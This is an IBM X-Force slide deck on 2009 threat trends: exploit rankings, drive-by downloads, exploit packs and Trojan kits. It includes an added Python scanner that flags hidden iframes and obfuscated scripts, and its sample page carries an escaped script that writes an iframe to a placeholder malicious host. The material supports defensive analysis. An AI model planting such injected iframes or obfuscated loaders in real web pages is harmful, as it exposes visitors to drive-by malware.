Security Trends
IBM Internet Security Systems (ISS) X-Force® Solutions
The IBM ISS X-Force® research and development team drives IBM Security Innovation
Research: Threat Landscape Forecasting; Malware Analysis; Public Vulnerability Analysis; Original Vulnerability Research
Protection Technology: X-Force Protection Engines (extensions to existing engines; new protection engine creation)
Development: X-Force XPUs (Security Content Updates); Security Content Update QA
Intelligence: X-Force Intelligence; X-Force Database
IBM X-Force Web Intelligence Lifecycle
• Monitor browsing of millions of end-users, thousands of customers, hundreds of countries
• Classify MSS links
• Find related websites (deep crawl)
• Search for malware
• Find new malicious websites
• Block all malicious domains
• Block malicious links
• Send links to Cobion
• Deep crawl of known malicious websites
• Analyze new exploit techniques
• Provide new protection guidance
• Develop protection
• Deliver updates
• Apply updates
The mission of the IBM Internet Security Systems™ X-Force® research and development team is to:
• Research and evaluate threat and protection issues
• Deliver security protection for today’s security problems
• Develop new technology for tomorrow’s security challenges
• Educate the media and user communities
X-Force Research
• 10B analyzed Web pages & images
• 150M intrusion attempts daily
• 40M spam & phishing attacks
• 43K documented vulnerabilities
• Millions of unique malware samples
Provides specific analysis of:
• Vulnerabilities & exploits
• Malicious/unwanted websites
• Spam and phishing
• Malware
• Other emerging trends
Looks Can Be Deceiving: Vulnerability Disclosures Decline but Exploitation Increases
• Declines in some of the largest categories of vulnerabilities
• The slowing disclosure rate is due to the disappearance of the low-hanging fruit from currently researched categories and existing applications
• Exploits targeting these vulnerabilities are increasing, especially SQL injection and ActiveX controls
• High vulnerabilities are down 6% YOY
• Medium vulnerabilities are up to 62% of all vulnerabilities (8% YOY increase)
YOY = year over year
Patches Still Unavailable for Half of Vulnerabilities
The top 10 categories of operating systems account for 89% of all operating system vulnerabilities.
Operating System | Percentage of Critical and High | Percentage of All OS Vulnerabilities
Microsoft | 39% | 14%
Apple | 18% | 24%
Sun Solaris | 14% | 26%
Nearly half (49%) of all vulnerabilities disclosed in the first half of 2009 had no vendor-supplied patches to remedy the vulnerability.
* Vendors with twenty or more disclosures in 1H 2009. ** IBM disclosures: 82; unpatched: 3; % unpatched: 3.7%
The Economics of Attacker Exploitation
Document Reader vulnerabilities:
• Widely deployed
• Public exploits
• Fits the drive-by-download business model
Exchange TNEF vulnerability:
• Widely deployed
• Valuable data
• No public exploit
• No plug-and-play business model
The drive-by-download process
• Desktop users browse the Internet
• Web server with embedded iframe
• Malicious iframe host: exploit material served
• Web browser targeted
• Downloader installed
• Malware installed and activated
Malicious Web Links Increase by 508% YOY
Personal homepages (typically hosted on communication service company domains) account for approximately half of all domains hosting at least one malicious link.
Among hosts with ten or more malicious links, pornography accounts for nearly 28% and gambling for more than 14%.
(Charts: One or More Malicious Links; Ten or More Malicious Links)
SQL Injection
SQL Injection Attack Tools
• Automatic page-rank verification
• Search engine integration for finding “vulnerable” sites
• Prioritization of results based on probability of successful injection
• Reverse domain name resolution
• etc.
The Three Legged Stool
Web App Vulnerabilities Continue to Dominate
• 50.4% of all vulnerabilities are Web application vulnerabilities
• SQL injection and Cross-Site Scripting are neck and neck in a race for the top spot
Security and Spending are Unbalanced
“The cleanup cost for fixing a bug in a homegrown Web application ranges anywhere from $400 to $4,000 to repair, depending on the vulnerability and the way it's fixed.” - Darkreading.com
Web Browsers are Complicated and Vulnerable
The largest number of client-side vulnerabilities in the first half of 2009 affects Web browsers and their plug-ins.
Mozilla Firefox surpasses Microsoft Internet Explorer for the first time.
Decline in Disclosures Does Not Impact Exploitation
The decline in ActiveX disclosures does not appear to be making an impact on exploitation.
Three of the five most popular exploits are ActiveX controls.
Most Popular Exploits
Rank | 2008 H2 | 2009 H1
1 | Microsoft MDAC RDS Dataspace ActiveX (CVE-2006-0003) | Microsoft MDAC RDS Dataspace ActiveX (CVE-2006-0003)
2 | Microsoft WebViewFolderIcon ActiveX (CVE-2006-3730) | Microsoft Snapshot Viewer ActiveX (CVE-2008-2463)
3 | Internet Explorer "createControlRange" DHTML (CVE-2005-0055) | Adobe Acrobat and Reader Collab.collectEmailInfo (CVE-2007-5659)
4 | RealPlayer IERPCtl ActiveX (CVE-2007-5601) | Microsoft IE7 DHTML Object Reuse (CVE-2009-0075)
5 | Apple QuickTime RTSP URL (CVE-2007-0015) | RealPlayer IERPCtl ActiveX (CVE-2007-5601)
First time that a PDF exploit is in the top 5 list.
Vulnerabilities in Document Readers Skyrocket
Portable Document Format (PDF) vulnerabilities disclosed in the first half of 2009 have already surpassed disclosures from all of 2008.
PDF disclosures traded places with Office document disclosures to take the top spot.
Points to consider:
• Users trust .PDF more than .EXE
• PDF exploits are becoming a popular method of attack
Adobe Security Update: APSB09-07
• An anonymous researcher reported through TippingPoint’s Zero Day Initiative (CVE-2009-1855)
• Jun Mao and Ryan Smith, iDefense Labs (CVE-2009-1856)
• Haifei Li of Fortinet's FortiGuard Global Security Research Team (CVE-2009-1857)
• Apple Product Security Team (CVE-2009-1858)
• Matthew Watchinski, Sourcefire VRT (CVE-2009-1859)
• Alin Rad Pop, Secunia Research (CVE-2009-0198)
• Will Dormann, CERT (CVE-2009-1861)
• Nicolas Joly, VUPEN Security (CVE
Popular drive-by-download exploit packs
• WebAttacker2
• Mpack
• IcePack
• Firepack (localized to French in May 2008)
• Neosploit
• Black Sun
• Cyber Bot
IcePack
First appeared in July 2007
Two versions of IcePack:
• Basic version “IcePack Lite Edition” (only has exploits for MS06-014 and MS06-006), sold for $30
• Advanced version “IcePack Platinum Edition”, sold for around $400
Produced by “IDT Group” in Russian
• English and French available
Licensed on a per-website basis
Contains Web browser optimized exploit pages:
/exploits/i.php - Optimized for Internet Explorer; contains WinZip exploits, QuickTime overflow, MS06-057 WebViewFolderIcon, MS06-055 VML
/exploits/movie.bin - QuickTime overflow exploit
/exploits/f.php - Firefox optimized version of MS06-006 exploit
/exploits/o.php - Opera optimized version of MS06-006 exploit
Javascript Obfuscation
The level of obfuscation found in Web exploits, and especially in PDF files, continues to rise.
Some of these techniques are being passed to malicious multimedia files as well.
From Q1 to Q2 alone, the amount of suspicious, obfuscated content monitored by IBM ISS Managed Security Services nearly doubled.
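Both the drive-by-download process described earlier (a Web server page reaches the browser carrying an embedded malicious iframe) and the rise in obfuscated script content are things a Web-filtering or managed-security team can score automatically before a page is served to users. The following Python script is an added example written for this page, not IBM, ISS or X-Force code. It parses a constructed sample page with the standard library, flags iframes the user cannot see (zero or tiny dimensions, display:none, visibility:hidden), scores each inline script on three assumed indicators (run-time decode calls such as eval, unescape, fromCharCode or document.write; string literals of 80 or more characters; 20 or more percent or hex escapes), and percent-decodes the long literals so an analyst can read what the script would write. The thresholds, the sample page and the .invalid host names are illustrative assumptions, not X-Force's rules.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample page (not captured content). It carries a benign video
# embed and a benign script, then a hidden iframe and a percent-escaped
# script that decodes and writes a second iframe at run time. Host names
# are placeholders under the reserved .invalid TLD.
SAMPLE_HTML = """<html><body>
<h1>Company news</h1>
<iframe src="https://video.example.com/embed/123" width="640" height="360"></iframe>
<script>
  function track() { console.log("page view"); }
  track();
</script>
<iframe src="http://bad.example.invalid/landing" width="0" height="0" style="visibility:hidden"></iframe>
<script>
var s="%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%61%64%2E%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64%2F%78%22%3E%3C%2F%69%66%72%61%6D%65%3E";
document.write(unescape(s));
</script>
</body></html>"""

# Heuristics: assumed indicators and thresholds chosen for illustration.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
DECODE_CALLS = re.compile(r"\b(?:eval|unescape|String\.fromCharCode|document\.write)\s*\(")
LONG_STRING = re.compile(r"""["']([^"'\n]{80,})["']""")
ESCAPES = re.compile(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")


def _dimension(value):
    """Parse a width/height attribute; None when absent or not numeric."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


class PageScanner(HTMLParser):
    """Collect iframe attributes and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.iframes = []       # one attribute dict per <iframe>
        self.scripts = []       # one body string per inline <script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def hidden_iframes(attrs_list, max_px=2):
    """Return src values of iframes the user cannot see: tiny geometry or hidden via CSS."""
    found = []
    for a in attrs_list:
        w, h = _dimension(a.get("width")), _dimension(a.get("height"))
        tiny = (w is not None and w <= max_px) or (h is not None and h <= max_px)
        css_hidden = bool(HIDDEN_STYLE.search(a.get("style") or ""))
        if tiny or css_hidden:
            found.append(a.get("src") or "")
    return found


def script_signals(body):
    """Indicators that a script builds or decodes a payload at run time."""
    return {
        "decode_call": bool(DECODE_CALLS.search(body)),
        "long_string": bool(LONG_STRING.search(body)),
        "many_escapes": len(ESCAPES.findall(body)) >= 20,
    }


def suspicious_scripts(bodies, min_signals=2):
    """Return (index, signals) for each script that hits at least min_signals indicators."""
    out = []
    for i, body in enumerate(bodies):
        sig = script_signals(body)
        if sum(sig.values()) >= min_signals:
            out.append((i, sig))
    return out


def decode_long_strings(body):
    """Percent-decode long string literals so an analyst can read what would be written."""
    return [unquote(m) for m in LONG_STRING.findall(body)]


def scan_html(html):
    """Run both checks over one page and return the findings."""
    p = PageScanner()
    p.feed(html)
    p.close()
    flagged = suspicious_scripts(p.scripts)
    return {
        "hidden_iframes": hidden_iframes(p.iframes),
        "suspicious_scripts": flagged,
        "decoded_strings": [s for i, _ in flagged for s in decode_long_strings(p.scripts[i])],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(scan_html(SAMPLE_HTML), indent=2))
```

Run directly, it prints the findings as JSON: the zero-size hidden iframe, the second script flagged on all three indicators, and the decoded literal showing that the script writes another iframe. In a proxy or crawler pipeline the same functions would feed a blocklist; the thresholds would need tuning against a corpus of known-good pages, since legitimate tracking and advertising code also uses long strings and document.write.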
Information Stealing Trojans and Fraud Tools Increasing
Trojans make up 55% of all malware
Infostealers & downloaders are the most common subcategories
• Infostealer Trojans target online games as well as banking credentials
Trojan Creator Kits
Constructor/Turkojan V.4 new features:
• Remote desktop
• Webcam streaming
• Audio streaming
• Remote passwords
• MSN sniffer
• Remote shell
• Advanced file manager
• Online & offline keylogger
• Information about remote computer
• Etc.
Commercial Anti-debugging Tools for Malware Authors
Code Virtualizer will convert your original code (Intel x86 instructions) into virtual opcodes that will only be understood by an internal virtual machine.
Code Virtualizer can protect your sensitive code areas in any x32 and x64 native PE files (like executable files/EXEs, system services, DLLs, OCXs, ActiveX controls, screen savers and device drivers).
Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into a different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions.
Malware Quality Assurance
Spam Continues to Change to Avoid Detection
Spam is up approximately 40% in 2009
60% of spam is classified as URL spam
Using “trusted” domains and “legitimate links” continues to help avoid anti-spam technologies
Brazil, the U.S., and India account for about 30% of worldwide spam
Image-based spam has returned
Most Common Domains in URL Spam, 2009 H1
Anonymity through botnet agents
SOCKS Jump Point
Many tools and services rely upon compromised hosts (typically botnet agents) to provide SOCKS proxies as anonymous exit/jump points.
Anonymous Proxies
Volume of proxy services increasing year over year
A Tale of Two Worms
MS03-026: Buffer Overrun in RPC Interface Could Allow Code Execution
• Patched July 2003
• Specially crafted RPC requests
• MS Blaster worm released August 11th, 2003
• Propagation rate peaked within 8 hours
• Microsoft: between 8 and 16 million infections
MS08-067: Vulnerability in Server Service Could Allow Remote Code Execution
• Patched October 23, 2008
• Specially crafted RPC requests
• Gimmiv.A: not very effective
• Conficker.A (November 20th): not very effective
• Conficker was a non-story in December of 2008
Internet security has improved in 2008
• Widespread use of Windows Update
• Better use of security tools: firewalls, IPS, antivirus
IBM’s Comprehensive Approach Mitigates the Threat
People and Identity
• Threat: Cracking of weak Windows Domain passwords
• Solution: Good network access control management
Data and Information
• Threat: Autorun, peer-to-peer drive mapping and thumb-drives
• Solution: Managed central file sharing with good access controls, anti-virus, and backup
Application and Process
• Threat: Exploitation of remote code execution vulnerabilities
• Solution: Effective device inventory and policy compliance focused on vulnerability and patch management
Network, Server, and End Point
• Threat: Automatic network propagation
• Solution: Intrusion Prevention at the Network, Server, and Host that can identify and preemptively prevent 0-day threats
X-Force 2008 Trend & Risk Report – Summary
• Vulnerabilities are at a high plateau
• Secure Web presence has become the Achilles heel of corporate IT security
• Mass endpoint exploitation is happening not only through browser vulnerabilities, but also through malicious movies and documents like Adobe PDF files
• Successful exploitation typically leads to the installation of information-stealing Trojans
2008 X-Force Annual Trend & Risk Report – Mapping to IBM Portfolio
Area of Risk: Vulnerabilities
- IBM ISS Intrusion Prevention System (IPS) products: Proventia Network IPS, Proventia Server, RealSecure Server Sensor, Proventia Desktop & Proventia Multifunction (MFS)
- IBM ISS Managed Protection Services for IPS
- Tivoli Security Information and Event Manager (TSIEM)
Area of Risk: Web Application Vulnerabilities
- Web application IPS security for Network, Server and MFS (April marketing launch)
- Managed Protection Services for IPS
- Rational AppScan for assessment
- Rational AppScan Enterprise
- Tivoli Security Information and Event Manager
- Tivoli Security Policy Manager
Area of Risk: PC Vulnerabilities including Malicious Web Exploits
- IBM ISS Intrusion Prevention System (IPS) product lines (see above list under Vulnerabilities)
- Managed Protection Services for IPS
- Managed Security Services for Web Security
- Proventia Web Filter
Area of Risk: Spam
Mail security offerings:
- Proventia Network Mail / Lotus Protector
- Proventia Multifunction System (MFS)
- Managed Security Services for Mail Security
Area of Risk: Unwanted Web Content
- Proventia MFS
- Managed Security Services for Web Security
- Proventia Web Filter
Area of Risk: Malware
- Proventia Desktop and MFS
- Managed Security Services for Mail and Web Security
- Proventia Network Mail / Lotus Protector
- Proventia Web Filter